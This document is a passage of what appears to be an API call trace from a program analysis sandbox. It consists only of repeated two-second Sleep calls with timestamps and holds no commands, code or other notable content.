Sleep (dwMilliseconds=0x7d0) [0236.644] Sleep (dwMilliseconds=0x7d0) [0236.752] Sleep (dwMilliseconds=0x7d0) [0236.804] Sleep (dwMilliseconds=0x7d0) [0236.818] Sleep (dwMilliseconds=0x7d0) [0236.921] Sleep (dwMilliseconds=0x7d0) [0236.982] Sleep (dwMilliseconds=0x7d0) [0237.159] Sleep (dwMilliseconds=0x7d0) [0237.217] Sleep (dwMilliseconds=0x7d0) [0237.342] Sleep (dwMilliseconds=0x7d0) [0237.404] Sleep (dwMilliseconds=0x7d0) [0237.498] Sleep (dwMilliseconds=0x7d0) [0237.638] Sleep (dwMilliseconds=0x7d0) [0237.733] Sleep (dwMilliseconds=0x7d0) [0237.825] Sleep (dwMilliseconds=0x7d0) [0237.889] Sleep (dwMilliseconds=0x7d0) [0237.939] Sleep (dwMilliseconds=0x7d0) [0237.997] Sleep (dwMilliseconds=0x7d0) [0238.085] Sleep (dwMilliseconds=0x7d0) [0238.143] Sleep (dwMilliseconds=0x7d0) [0238.286] Sleep (dwMilliseconds=0x7d0) [0238.343] Sleep (dwMilliseconds=0x7d0) [0238.435] Sleep (dwMilliseconds=0x7d0) [0238.559] Sleep (dwMilliseconds=0x7d0) [0238.652] Sleep (dwMilliseconds=0x7d0) [0238.734] Sleep (dwMilliseconds=0x7d0) [0238.778] Sleep (dwMilliseconds=0x7d0) [0238.911] Sleep (dwMilliseconds=0x7d0) [0238.997] Sleep (dwMilliseconds=0x7d0) [0239.089] Sleep (dwMilliseconds=0x7d0) [0239.245] Sleep (dwMilliseconds=0x7d0) [0239.370] Sleep (dwMilliseconds=0x7d0) [0239.436] Sleep (dwMilliseconds=0x7d0) [0239.479] Sleep (dwMilliseconds=0x7d0) [0239.536] Sleep (dwMilliseconds=0x7d0) [0239.575] Sleep (dwMilliseconds=0x7d0) [0239.651] Sleep (dwMilliseconds=0x7d0) [0239.698] Sleep (dwMilliseconds=0x7d0) [0239.745] Sleep (dwMilliseconds=0x7d0) [0239.884] Sleep (dwMilliseconds=0x7d0) [0244.390] Sleep (dwMilliseconds=0x7d0) [0244.393] Sleep (dwMilliseconds=0x7d0) [0244.409] Sleep (dwMilliseconds=0x7d0) [0244.424] Sleep (dwMilliseconds=0x7d0) [0244.462] Sleep (dwMilliseconds=0x7d0) [0244.471] Sleep (dwMilliseconds=0x7d0) [0244.487] Sleep (dwMilliseconds=0x7d0) [0244.502] Sleep (dwMilliseconds=0x7d0) [0244.523] Sleep (dwMilliseconds=0x7d0) [0244.534] Sleep (dwMilliseconds=0x7d0) [0244.553] Sleep (dwMilliseconds=0x7d0) [0244.719] Sleep (dwMilliseconds=0x7d0) [0244.736] Sleep (dwMilliseconds=0x7d0) [0244.786] Sleep (dwMilliseconds=0x7d0) [0244.800] Sleep (dwMilliseconds=0x7d0) [0244.814] Sleep (dwMilliseconds=0x7d0) [0244.831] Sleep (dwMilliseconds=0x7d0) [0244.846] Sleep (dwMilliseconds=0x7d0) [0244.861] Sleep (dwMilliseconds=0x7d0) [0244.877] Sleep (dwMilliseconds=0x7d0) [0244.893] Sleep (dwMilliseconds=0x7d0) [0244.910] Sleep (dwMilliseconds=0x7d0) [0244.923] Sleep (dwMilliseconds=0x7d0) [0244.940] Sleep (dwMilliseconds=0x7d0) [0244.955] Sleep (dwMilliseconds=0x7d0) [0244.970] Sleep (dwMilliseconds=0x7d0) [0245.015] Sleep (dwMilliseconds=0x7d0) [0245.017] Sleep (dwMilliseconds=0x7d0) [0245.033] Sleep (dwMilliseconds=0x7d0) [0245.052] Sleep (dwMilliseconds=0x7d0) [0245.064] Sleep (dwMilliseconds=0x7d0) [0245.079] Sleep (dwMilliseconds=0x7d0) [0245.096] Sleep (dwMilliseconds=0x7d0) [0245.111] Sleep (dwMilliseconds=0x7d0) [0245.126] Sleep (dwMilliseconds=0x7d0) [0245.142] Sleep (dwMilliseconds=0x7d0) [0245.158] Sleep (dwMilliseconds=0x7d0) [0245.173] Sleep (dwMilliseconds=0x7d0) [0245.189] Sleep (dwMilliseconds=0x7d0) [0245.211] Sleep (dwMilliseconds=0x7d0) [0245.251] Sleep (dwMilliseconds=0x7d0) [0245.298] Sleep (dwMilliseconds=0x7d0) [0245.344] Sleep (dwMilliseconds=0x7d0) [0245.392] Sleep (dwMilliseconds=0x7d0) [0245.421] Sleep (dwMilliseconds=0x7d0) [0245.439] Sleep (dwMilliseconds=0x7d0) [0245.486] Sleep (dwMilliseconds=0x7d0) [0245.533] Sleep (dwMilliseconds=0x7d0) [0245.579] Sleep (dwMilliseconds=0x7d0) [0245.609] Sleep (dwMilliseconds=0x7d0) [0245.625] Sleep (dwMilliseconds=0x7d0) [0245.681] Sleep (dwMilliseconds=0x7d0) [0245.702] Sleep (dwMilliseconds=0x7d0) [0245.719] Sleep (dwMilliseconds=0x7d0) [0245.782] Sleep (dwMilliseconds=0x7d0) [0245.805] Sleep (dwMilliseconds=0x7d0) [0245.869] Sleep (dwMilliseconds=0x7d0) [0245.910] Sleep (dwMilliseconds=0x7d0) [0245.940] Sleep (dwMilliseconds=0x7d0) [0245.969] Sleep (dwMilliseconds=0x7d0) [0246.016] Sleep (dwMilliseconds=0x7d0) [0246.041] Sleep (dwMilliseconds=0x7d0) [0246.059] Sleep (dwMilliseconds=0x7d0) [0246.094] Sleep (dwMilliseconds=0x7d0) [0246.133] Sleep (dwMilliseconds=0x7d0) [0246.187] Sleep (dwMilliseconds=0x7d0) [0246.248] Sleep (dwMilliseconds=0x7d0) [0246.296] Sleep (dwMilliseconds=0x7d0) [0246.335] Sleep (dwMilliseconds=0x7d0) [0246.391] Sleep (dwMilliseconds=0x7d0) [0246.428] Sleep (dwMilliseconds=0x7d0) [0246.515] Sleep (dwMilliseconds=0x7d0) [0246.551] Sleep (dwMilliseconds=0x7d0) [0246.609] Sleep (dwMilliseconds=0x7d0) [0246.688] Sleep (dwMilliseconds=0x7d0) [0246.713] Sleep (dwMilliseconds=0x7d0) [0246.770] Sleep (dwMilliseconds=0x7d0) [0246.812] Sleep (dwMilliseconds=0x7d0) [0246.846] Sleep (dwMilliseconds=0x7d0) [0246.874] Sleep (dwMilliseconds=0x7d0) [0246.920] Sleep (dwMilliseconds=0x7d0) [0246.967] Sleep (dwMilliseconds=0x7d0) [0247.015] Sleep (dwMilliseconds=0x7d0) [0247.071] Sleep (dwMilliseconds=0x7d0) [0247.123] Sleep (dwMilliseconds=0x7d0) [0247.156] Sleep (dwMilliseconds=0x7d0) [0247.211] Sleep (dwMilliseconds=0x7d0) [0247.249] Sleep (dwMilliseconds=0x7d0) [0247.264] Sleep (dwMilliseconds=0x7d0) [0247.294] Sleep (dwMilliseconds=0x7d0) [0247.341] Sleep (dwMilliseconds=0x7d0) [0247.358] Sleep (dwMilliseconds=0x7d0) [0247.388] Sleep (dwMilliseconds=0x7d0) [0247.446] Sleep (dwMilliseconds=0x7d0) [0247.509] Sleep (dwMilliseconds=0x7d0) [0247.528] Sleep (dwMilliseconds=0x7d0) [0247.565] Sleep (dwMilliseconds=0x7d0) [0247.607] Sleep (dwMilliseconds=0x7d0) [0247.622] Sleep (dwMilliseconds=0x7d0) [0247.669] Sleep (dwMilliseconds=0x7d0) [0247.711] Sleep (dwMilliseconds=0x7d0) [0247.757] Sleep (dwMilliseconds=0x7d0) [0247.826] Sleep (dwMilliseconds=0x7d0) [0247.872] Sleep (dwMilliseconds=0x7d0) [0247.888] Sleep (dwMilliseconds=0x7d0) [0247.919] Sleep (dwMilliseconds=0x7d0) [0247.965] Sleep (dwMilliseconds=0x7d0) [0247.981] Sleep (dwMilliseconds=0x7d0) [0248.012] Sleep (dwMilliseconds=0x7d0) [0248.061] Sleep (dwMilliseconds=0x7d0) [0248.075] Sleep (dwMilliseconds=0x7d0) [0248.106] Sleep (dwMilliseconds=0x7d0) [0248.153] Sleep (dwMilliseconds=0x7d0) [0248.168] Sleep (dwMilliseconds=0x7d0) [0248.199] Sleep (dwMilliseconds=0x7d0) [0248.246] Sleep (dwMilliseconds=0x7d0) [0248.263] Sleep (dwMilliseconds=0x7d0) [0248.293] Sleep (dwMilliseconds=0x7d0) [0248.340] Sleep (dwMilliseconds=0x7d0) [0248.358] Sleep (dwMilliseconds=0x7d0) [0248.386] Sleep (dwMilliseconds=0x7d0) [0248.433] Sleep (dwMilliseconds=0x7d0) [0248.455] Sleep (dwMilliseconds=0x7d0) [0248.481] Sleep (dwMilliseconds=0x7d0) [0248.527] Sleep (dwMilliseconds=0x7d0) [0248.560] Sleep (dwMilliseconds=0x7d0) [0248.620] Sleep (dwMilliseconds=0x7d0) [0248.665] Sleep (dwMilliseconds=0x7d0) [0248.716] Sleep (dwMilliseconds=0x7d0) [0248.759] Sleep (dwMilliseconds=0x7d0) [0248.808] Sleep (dwMilliseconds=0x7d0) [0248.855] Sleep (dwMilliseconds=0x7d0) [0248.870] Sleep (dwMilliseconds=0x7d0) [0248.901] Sleep (dwMilliseconds=0x7d0) [0248.948] Sleep (dwMilliseconds=0x7d0) [0248.964] Sleep (dwMilliseconds=0x7d0) [0248.995] Sleep (dwMilliseconds=0x7d0) [0249.036] Sleep (dwMilliseconds=0x7d0) [0249.075] Sleep (dwMilliseconds=0x7d0) [0249.104] Sleep (dwMilliseconds=0x7d0) [0249.152] Sleep (dwMilliseconds=0x7d0) [0249.176] Sleep (dwMilliseconds=0x7d0) [0249.198] Sleep (dwMilliseconds=0x7d0) [0249.245] Sleep (dwMilliseconds=0x7d0) [0249.265] Sleep (dwMilliseconds=0x7d0) [0249.292] Sleep (dwMilliseconds=0x7d0) [0249.338] Sleep (dwMilliseconds=0x7d0) [0249.369] Sleep (dwMilliseconds=0x7d0) [0249.387] Sleep (dwMilliseconds=0x7d0) [0249.432] Sleep (dwMilliseconds=0x7d0) [0249.463] Sleep (dwMilliseconds=0x7d0) [0249.479] Sleep (dwMilliseconds=0x7d0) [0249.541] Sleep (dwMilliseconds=0x7d0) [0249.584] Sleep (dwMilliseconds=0x7d0) [0249.634] Sleep (dwMilliseconds=0x7d0) [0249.682] Sleep (dwMilliseconds=0x7d0) [0249.697] Sleep (dwMilliseconds=0x7d0) [0249.728] Sleep (dwMilliseconds=0x7d0) [0249.796] Sleep (dwMilliseconds=0x7d0) [0249.808] Sleep (dwMilliseconds=0x7d0) [0249.882] Sleep (dwMilliseconds=0x7d0) [0249.907] Sleep (dwMilliseconds=0x7d0) [0249.931] Sleep (dwMilliseconds=0x7d0) [0249.978] Sleep (dwMilliseconds=0x7d0) [0250.001] Sleep (dwMilliseconds=0x7d0) [0250.025] Sleep (dwMilliseconds=0x7d0) [0250.072] Sleep (dwMilliseconds=0x7d0) [0250.095] Sleep (dwMilliseconds=0x7d0) [0250.118] Sleep (dwMilliseconds=0x7d0) [0250.165] Sleep (dwMilliseconds=0x7d0) [0250.204] Sleep (dwMilliseconds=0x7d0) [0250.259] Sleep (dwMilliseconds=0x7d0) [0250.306] Sleep (dwMilliseconds=0x7d0) [0250.323] Sleep (dwMilliseconds=0x7d0) [0250.383] Sleep (dwMilliseconds=0x7d0) [0250.665] Sleep (dwMilliseconds=0x7d0) [0250.680] Sleep (dwMilliseconds=0x7d0) [0250.711] Sleep (dwMilliseconds=0x7d0) [0250.758] Sleep (dwMilliseconds=0x7d0) [0250.775] Sleep (dwMilliseconds=0x7d0) [0250.805] Sleep (dwMilliseconds=0x7d0) [0250.868] Sleep (dwMilliseconds=0x7d0) [0250.896] Sleep (dwMilliseconds=0x7d0) [0250.914] Sleep (dwMilliseconds=0x7d0) [0250.965] Sleep (dwMilliseconds=0x7d0) [0251.000] Sleep (dwMilliseconds=0x7d0) [0251.070] Sleep (dwMilliseconds=0x7d0) [0251.117] Sleep (dwMilliseconds=0x7d0) [0251.132] Sleep (dwMilliseconds=0x7d0) [0251.164] Sleep (dwMilliseconds=0x7d0) [0251.210] Sleep (dwMilliseconds=0x7d0) [0251.233] Sleep (dwMilliseconds=0x7d0) [0251.257] Sleep (dwMilliseconds=0x7d0) [0251.304] Sleep (dwMilliseconds=0x7d0) [0251.325] Sleep (dwMilliseconds=0x7d0) [0251.350] Sleep (dwMilliseconds=0x7d0) [0251.397] Sleep (dwMilliseconds=0x7d0) [0251.484] Sleep (dwMilliseconds=0x7d0) [0251.506] Sleep (dwMilliseconds=0x7d0) [0251.553] Sleep (dwMilliseconds=0x7d0) [0251.578] Sleep (dwMilliseconds=0x7d0) [0251.600] Sleep (dwMilliseconds=0x7d0) [0251.647] Sleep (dwMilliseconds=0x7d0) [0251.680] Sleep (dwMilliseconds=0x7d0) [0251.709] Sleep (dwMilliseconds=0x7d0) [0251.778] Sleep (dwMilliseconds=0x7d0) [0251.792] Sleep (dwMilliseconds=0x7d0) [0251.834] Sleep (dwMilliseconds=0x7d0) [0251.882] Sleep (dwMilliseconds=0x7d0) [0251.897] Sleep (dwMilliseconds=0x7d0) [0251.928] Sleep (dwMilliseconds=0x7d0) [0251.974] Sleep (dwMilliseconds=0x7d0) [0251.991] Sleep (dwMilliseconds=0x7d0) [0252.024] Sleep (dwMilliseconds=0x7d0) [0252.072] Sleep (dwMilliseconds=0x7d0) [0252.113] Sleep (dwMilliseconds=0x7d0) [0252.147] Sleep (dwMilliseconds=0x7d0) [0252.193] Sleep (dwMilliseconds=0x7d0) [0252.209] Sleep (dwMilliseconds=0x7d0) [0252.240] Sleep (dwMilliseconds=0x7d0) [0252.286] Sleep (dwMilliseconds=0x7d0) [0252.309] Sleep (dwMilliseconds=0x7d0) [0252.333] Sleep (dwMilliseconds=0x7d0) [0252.380] Sleep (dwMilliseconds=0x7d0) [0252.410] Sleep (dwMilliseconds=0x7d0) [0252.427] Sleep (dwMilliseconds=0x7d0) [0252.474] Sleep (dwMilliseconds=0x7d0) [0252.494] Sleep (dwMilliseconds=0x7d0) [0252.520] Sleep (dwMilliseconds=0x7d0) [0252.567] Sleep (dwMilliseconds=0x7d0) [0252.592] Sleep (dwMilliseconds=0x7d0) [0252.614] Sleep (dwMilliseconds=0x7d0) [0252.661] Sleep (dwMilliseconds=0x7d0) [0252.684] Sleep (dwMilliseconds=0x7d0) [0252.708] Sleep (dwMilliseconds=0x7d0) [0252.755] Sleep (dwMilliseconds=0x7d0) [0252.778] Sleep (dwMilliseconds=0x7d0) [0252.802] Sleep (dwMilliseconds=0x7d0) [0252.848] Sleep (dwMilliseconds=0x7d0) [0252.877] Sleep (dwMilliseconds=0x7d0) [0252.895] Sleep (dwMilliseconds=0x7d0) [0252.942] Sleep (dwMilliseconds=0x7d0) [0252.977] Sleep (dwMilliseconds=0x7d0) [0253.036] Sleep (dwMilliseconds=0x7d0) [0253.080] Sleep (dwMilliseconds=0x7d0) [0253.145] Sleep (dwMilliseconds=0x7d0) [0253.192] Sleep (dwMilliseconds=0x7d0) [0253.207] Sleep (dwMilliseconds=0x7d0) [0253.238] Sleep (dwMilliseconds=0x7d0) [0253.286] Sleep (dwMilliseconds=0x7d0) [0253.301] Sleep (dwMilliseconds=0x7d0) [0253.347] Sleep (dwMilliseconds=0x7d0) [0253.395] Sleep (dwMilliseconds=0x7d0) [0253.413] Sleep (dwMilliseconds=0x7d0) [0253.441] Sleep (dwMilliseconds=0x7d0) [0253.497] Sleep (dwMilliseconds=0x7d0) [0253.525] Sleep (dwMilliseconds=0x7d0) [0253.550] Sleep (dwMilliseconds=0x7d0) [0253.598] Sleep (dwMilliseconds=0x7d0) [0253.627] Sleep (dwMilliseconds=0x7d0) [0253.644] Sleep (dwMilliseconds=0x7d0) [0253.702] Sleep (dwMilliseconds=0x7d0) [0253.733] Sleep (dwMilliseconds=0x7d0) [0253.753] Sleep (dwMilliseconds=0x7d0) [0253.800] Sleep (dwMilliseconds=0x7d0) [0253.834] Sleep (dwMilliseconds=0x7d0) [0253.893] Sleep (dwMilliseconds=0x7d0) [0253.943] Sleep (dwMilliseconds=0x7d0) [0253.987] Sleep (dwMilliseconds=0x7d0) [0254.034] Sleep (dwMilliseconds=0x7d0) [0254.050] Sleep (dwMilliseconds=0x7d0) [0254.112] Sleep (dwMilliseconds=0x7d0) [0254.156] Sleep (dwMilliseconds=0x7d0) [0254.205] Sleep (dwMilliseconds=0x7d0) [0254.249] Sleep (dwMilliseconds=0x7d0) [0254.300] Sleep (dwMilliseconds=0x7d0) [0254.346] Sleep (dwMilliseconds=0x7d0) [0254.361] Sleep (dwMilliseconds=0x7d0) [0254.393] Sleep (dwMilliseconds=0x7d0) [0254.439] Sleep (dwMilliseconds=0x7d0) [0254.455] Sleep (dwMilliseconds=0x7d0) [0254.486] Sleep (dwMilliseconds=0x7d0) [0254.549] Sleep (dwMilliseconds=0x7d0) [0254.603] Sleep (dwMilliseconds=0x7d0) [0254.658] Sleep (dwMilliseconds=0x7d0) [0254.704] Sleep (dwMilliseconds=0x7d0) [0254.724] Sleep (dwMilliseconds=0x7d0) [0254.767] Sleep (dwMilliseconds=0x7d0) [0254.812] Sleep (dwMilliseconds=0x7d0) [0254.861] Sleep (dwMilliseconds=0x7d0) [0254.895] Sleep (dwMilliseconds=0x7d0) [0254.955] Sleep (dwMilliseconds=0x7d0) [0255.001] Sleep (dwMilliseconds=0x7d0) [0255.017] Sleep (dwMilliseconds=0x7d0) [0255.048] Sleep (dwMilliseconds=0x7d0) [0255.123] Sleep (dwMilliseconds=0x7d0) [0255.132] Sleep (dwMilliseconds=0x7d0) [0255.173] Sleep (dwMilliseconds=0x7d0) [0255.219] Sleep (dwMilliseconds=0x7d0) [0255.237] Sleep (dwMilliseconds=0x7d0) [0255.266] Sleep (dwMilliseconds=0x7d0) [0255.313] Sleep (dwMilliseconds=0x7d0) [0255.333] Sleep (dwMilliseconds=0x7d0) [0255.360] Sleep (dwMilliseconds=0x7d0) [0255.422] Sleep (dwMilliseconds=0x7d0) [0255.461] Sleep (dwMilliseconds=0x7d0) [0255.517] Sleep (dwMilliseconds=0x7d0) [0255.555] Sleep (dwMilliseconds=0x7d0) [0255.609] Sleep (dwMilliseconds=0x7d0) [0255.656] Sleep (dwMilliseconds=0x7d0) [0255.703] Sleep (dwMilliseconds=0x7d0) [0255.750] Sleep (dwMilliseconds=0x7d0) [0255.771] Sleep (dwMilliseconds=0x7d0) [0255.796] Sleep (dwMilliseconds=0x7d0) [0255.846] Sleep (dwMilliseconds=0x7d0) [0255.883] Sleep (dwMilliseconds=0x7d0) [0255.937] Sleep (dwMilliseconds=0x7d0) [0255.984] Sleep (dwMilliseconds=0x7d0) [0255.999] Sleep (dwMilliseconds=0x7d0) [0256.030] Sleep (dwMilliseconds=0x7d0) [0256.077] Sleep (dwMilliseconds=0x7d0) [0256.132] Sleep (dwMilliseconds=0x7d0) [0256.156] Sleep (dwMilliseconds=0x7d0) [0256.202] Sleep (dwMilliseconds=0x7d0) [0256.243] Sleep (dwMilliseconds=0x7d0) [0256.296] Sleep (dwMilliseconds=0x7d0) [0256.343] Sleep (dwMilliseconds=0x7d0) [0256.358] Sleep (dwMilliseconds=0x7d0) [0256.396] Sleep (dwMilliseconds=0x7d0) [0256.439] Sleep (dwMilliseconds=0x7d0) [0256.457] Sleep (dwMilliseconds=0x7d0) [0256.483] Sleep (dwMilliseconds=0x7d0) [0256.530] Sleep (dwMilliseconds=0x7d0) [0256.555] Sleep (dwMilliseconds=0x7d0) [0256.577] Sleep (dwMilliseconds=0x7d0) [0256.623] Sleep (dwMilliseconds=0x7d0) [0256.644] Sleep (dwMilliseconds=0x7d0) [0256.670] Sleep (dwMilliseconds=0x7d0) [0256.718] Sleep (dwMilliseconds=0x7d0) [0256.751] Sleep (dwMilliseconds=0x7d0) [0256.810] Sleep (dwMilliseconds=0x7d0) [0256.854] Sleep (dwMilliseconds=0x7d0) [0256.905] Sleep (dwMilliseconds=0x7d0) [0257.010] Sleep (dwMilliseconds=0x7d0) [0257.185] Sleep (dwMilliseconds=0x7d0) [0257.983] Sleep (dwMilliseconds=0x7d0) [0258.000] Sleep (dwMilliseconds=0x7d0) [0258.051] Sleep (dwMilliseconds=0x7d0) [0258.095] Sleep (dwMilliseconds=0x7d0) [0258.122] Sleep (dwMilliseconds=0x7d0) [0258.168] Sleep (dwMilliseconds=0x7d0) [0258.229] Sleep (dwMilliseconds=0x7d0) [0258.254] Sleep (dwMilliseconds=0x7d0) [0258.295] Sleep (dwMilliseconds=0x7d0) [0258.339] Sleep (dwMilliseconds=0x7d0) [0258.356] Sleep (dwMilliseconds=0x7d0) [0258.386] Sleep (dwMilliseconds=0x7d0) [0258.433] Sleep (dwMilliseconds=0x7d0) [0258.448] Sleep (dwMilliseconds=0x7d0) [0258.480] Sleep (dwMilliseconds=0x7d0) [0258.526] Sleep (dwMilliseconds=0x7d0) [0258.542] Sleep (dwMilliseconds=0x7d0) [0258.575] Sleep (dwMilliseconds=0x7d0) [0258.620] Sleep (dwMilliseconds=0x7d0) [0258.636] Sleep (dwMilliseconds=0x7d0) [0258.667] Sleep (dwMilliseconds=0x7d0) [0258.715] Sleep (dwMilliseconds=0x7d0) [0258.729] Sleep (dwMilliseconds=0x7d0) [0258.761] Sleep (dwMilliseconds=0x7d0) [0258.823] Sleep (dwMilliseconds=0x7d0) [0258.840] Sleep (dwMilliseconds=0x7d0) [0259.136] Sleep (dwMilliseconds=0x7d0) [0259.214] Sleep (dwMilliseconds=0x7d0) [0259.291] Sleep (dwMilliseconds=0x7d0) [0259.338] Sleep (dwMilliseconds=0x7d0) [0259.572] Sleep (dwMilliseconds=0x7d0) [0260.274] Sleep (dwMilliseconds=0x7d0) [0260.329] Sleep (dwMilliseconds=0x7d0) [0260.664] Sleep (dwMilliseconds=0x7d0) [0261.382] Sleep (dwMilliseconds=0x7d0) [0261.453] Sleep (dwMilliseconds=0x7d0) [0261.493] Sleep (dwMilliseconds=0x7d0) [0261.670] Sleep (dwMilliseconds=0x7d0) [0261.751] Sleep (dwMilliseconds=0x7d0) [0262.017] Sleep (dwMilliseconds=0x7d0) [0262.058] Sleep (dwMilliseconds=0x7d0) [0262.069] Sleep (dwMilliseconds=0x7d0) [0262.115] Sleep (dwMilliseconds=0x7d0) [0262.150] Sleep (dwMilliseconds=0x7d0) [0262.208] Sleep (dwMilliseconds=0x7d0) [0262.268] Sleep (dwMilliseconds=0x7d0) [0262.279] Sleep (dwMilliseconds=0x7d0) [0262.317] Sleep (dwMilliseconds=0x7d0) [0262.366] Sleep (dwMilliseconds=0x7d0) [0262.386] Sleep (dwMilliseconds=0x7d0) [0262.417] Sleep (dwMilliseconds=0x7d0) [0262.459] Sleep (dwMilliseconds=0x7d0) [0262.514] Sleep (dwMilliseconds=0x7d0) [0262.567] Sleep (dwMilliseconds=0x7d0) [0262.615] Sleep (dwMilliseconds=0x7d0) [0262.629] Sleep (dwMilliseconds=0x7d0) [0262.661] Sleep (dwMilliseconds=0x7d0) [0262.709] Sleep (dwMilliseconds=0x7d0) [0262.729] Sleep (dwMilliseconds=0x7d0) [0262.754] Sleep (dwMilliseconds=0x7d0) [0262.802] Sleep (dwMilliseconds=0x7d0) [0262.846] Sleep (dwMilliseconds=0x7d0) [0262.895] Sleep (dwMilliseconds=0x7d0) [0262.944] Sleep (dwMilliseconds=0x7d0) [0262.958] Sleep (dwMilliseconds=0x7d0) [0262.999] Sleep (dwMilliseconds=0x7d0) [0263.039] Sleep (dwMilliseconds=0x7d0) [0263.068] Sleep (dwMilliseconds=0x7d0) [0263.084] Sleep (dwMilliseconds=0x7d0) [0263.131] Sleep (dwMilliseconds=0x7d0) [0263.166] Sleep (dwMilliseconds=0x7d0) [0263.222] Sleep (dwMilliseconds=0x7d0) [0263.283] Sleep (dwMilliseconds=0x7d0) [0263.286] Sleep (dwMilliseconds=0x7d0) [0263.331] Sleep (dwMilliseconds=0x7d0) [0263.380] Sleep (dwMilliseconds=0x7d0) [0263.410] Sleep (dwMilliseconds=0x7d0) [0263.429] Sleep (dwMilliseconds=0x7d0) [0263.495] Sleep (dwMilliseconds=0x7d0) [0263.535] Sleep (dwMilliseconds=0x7d0) [0263.550] Sleep (dwMilliseconds=0x7d0) [0263.582] Sleep (dwMilliseconds=0x7d0) [0263.631] Sleep (dwMilliseconds=0x7d0) [0263.657] Sleep (dwMilliseconds=0x7d0) [0263.675] Sleep (dwMilliseconds=0x7d0) [0263.723] Sleep (dwMilliseconds=0x7d0) [0263.755] Sleep (dwMilliseconds=0x7d0) [0263.784] Sleep (dwMilliseconds=0x7d0) [0263.831] Sleep (dwMilliseconds=0x7d0) [0263.872] Sleep (dwMilliseconds=0x7d0) [0263.924] Sleep (dwMilliseconds=0x7d0) [0263.972] Sleep (dwMilliseconds=0x7d0) [0264.019] Sleep (dwMilliseconds=0x7d0) [0264.055] Sleep (dwMilliseconds=0x7d0) [0264.071] Sleep (dwMilliseconds=0x7d0) [0264.111] Sleep (dwMilliseconds=0x7d0) [0264.162] Sleep (dwMilliseconds=0x7d0) [0264.193] Sleep (dwMilliseconds=0x7d0) [0264.220] Sleep (dwMilliseconds=0x7d0) [0264.289] Sleep (dwMilliseconds=0x7d0) [0264.316] Sleep (dwMilliseconds=0x7d0) [0264.345] Sleep (dwMilliseconds=0x7d0) [0264.397] Sleep (dwMilliseconds=0x7d0) [0264.446] Sleep (dwMilliseconds=0x7d0) [0264.456] Sleep (dwMilliseconds=0x7d0) [0264.518] Sleep (dwMilliseconds=0x7d0) [0264.560] Sleep (dwMilliseconds=0x7d0) [0264.614] Sleep (dwMilliseconds=0x7d0) [0264.659] Sleep (dwMilliseconds=0x7d0) [0264.677] Sleep (dwMilliseconds=0x7d0) [0264.722] Sleep (dwMilliseconds=0x7d0) [0264.768] Sleep (dwMilliseconds=0x7d0) [0264.782] Sleep (dwMilliseconds=0x7d0) [0264.815] Sleep (dwMilliseconds=0x7d0) [0264.877] Sleep (dwMilliseconds=0x7d0) [0264.914] Sleep (dwMilliseconds=0x7d0) [0264.939] Sleep (dwMilliseconds=0x7d0) [0264.987] Sleep (dwMilliseconds=0x7d0) [0265.022] Sleep (dwMilliseconds=0x7d0) [0265.079] Sleep (dwMilliseconds=0x7d0) [0265.126] Sleep (dwMilliseconds=0x7d0) [0265.141] Sleep (dwMilliseconds=0x7d0) [0265.173] Sleep (dwMilliseconds=0x7d0) [0265.221] Sleep (dwMilliseconds=0x7d0) [0265.240] Sleep (dwMilliseconds=0x7d0) [0265.273] Sleep (dwMilliseconds=0x7d0) [0265.330] Sleep (dwMilliseconds=0x7d0) [0265.366] Sleep (dwMilliseconds=0x7d0) [0265.377] Sleep (dwMilliseconds=0x7d0) [0265.407] Sleep (dwMilliseconds=0x7d0) [0265.454] Sleep (dwMilliseconds=0x7d0) [0265.503] Sleep (dwMilliseconds=0x7d0) [0265.531] Sleep (dwMilliseconds=0x7d0) [0265.579] Sleep (dwMilliseconds=0x7d0) [0265.604] Sleep (dwMilliseconds=0x7d0) [0265.625] Sleep (dwMilliseconds=0x7d0) [0265.673] Sleep (dwMilliseconds=0x7d0) [0265.705] Sleep (dwMilliseconds=0x7d0) [0265.734] Sleep (dwMilliseconds=0x7d0) [0265.781] Sleep (dwMilliseconds=0x7d0) [0265.817] Sleep (dwMilliseconds=0x7d0) [0265.874] Sleep (dwMilliseconds=0x7d0) [0265.923] Sleep (dwMilliseconds=0x7d0) [0265.937] Sleep (dwMilliseconds=0x7d0) [0265.986] Sleep (dwMilliseconds=0x7d0) [0266.034] Sleep (dwMilliseconds=0x7d0) [0266.056] Sleep (dwMilliseconds=0x7d0) [0266.081] Sleep (dwMilliseconds=0x7d0) [0266.125] Sleep (dwMilliseconds=0x7d0) [0266.172] Sleep (dwMilliseconds=0x7d0) [0266.189] Sleep (dwMilliseconds=0x7d0) [0266.234] Sleep (dwMilliseconds=0x7d0) [0266.296] Sleep (dwMilliseconds=0x7d0) [0266.312] Sleep (dwMilliseconds=0x7d0) [0266.344] Sleep (dwMilliseconds=0x7d0) [0266.390] Sleep (dwMilliseconds=0x7d0) [0266.408] Sleep (dwMilliseconds=0x7d0) [0266.452] Sleep (dwMilliseconds=0x7d0) [0266.575] Sleep (dwMilliseconds=0x7d0) [0266.674] Sleep (dwMilliseconds=0x7d0) [0266.751] Sleep (dwMilliseconds=0x7d0) [0266.843] Sleep (dwMilliseconds=0x7d0) [0266.878] Sleep (dwMilliseconds=0x7d0) [0266.923] Sleep (dwMilliseconds=0x7d0) [0266.974] Sleep (dwMilliseconds=0x7d0) [0267.108] Sleep (dwMilliseconds=0x7d0) [0267.184] Sleep (dwMilliseconds=0x7d0) [0267.266] Sleep (dwMilliseconds=0x7d0) [0267.330] Sleep (dwMilliseconds=0x7d0) [0267.938] Sleep (dwMilliseconds=0x7d0) [0268.030] Sleep (dwMilliseconds=0x7d0) [0268.419] Sleep (dwMilliseconds=0x7d0) [0268.512] Sleep (dwMilliseconds=0x7d0) [0268.671] Sleep (dwMilliseconds=0x7d0) [0268.826] Sleep (dwMilliseconds=0x7d0) [0268.935] Sleep (dwMilliseconds=0x7d0) [0269.076] Sleep (dwMilliseconds=0x7d0) [0269.230] Sleep (dwMilliseconds=0x7d0) [0269.366] Sleep (dwMilliseconds=0x7d0) [0269.558] Sleep (dwMilliseconds=0x7d0) [0269.713] Sleep (dwMilliseconds=0x7d0) [0269.886] Sleep (dwMilliseconds=0x7d0) [0270.048] Sleep (dwMilliseconds=0x7d0) [0270.196] Sleep (dwMilliseconds=0x7d0) [0270.321] Sleep (dwMilliseconds=0x7d0) [0270.446] Sleep (dwMilliseconds=0x7d0) [0270.602] Sleep (dwMilliseconds=0x7d0) [0270.743] Sleep (dwMilliseconds=0x7d0) [0270.898] Sleep (dwMilliseconds=0x7d0) [0271.054] Sleep (dwMilliseconds=0x7d0) [0271.211] Sleep (dwMilliseconds=0x7d0) [0271.382] Sleep (dwMilliseconds=0x7d0) 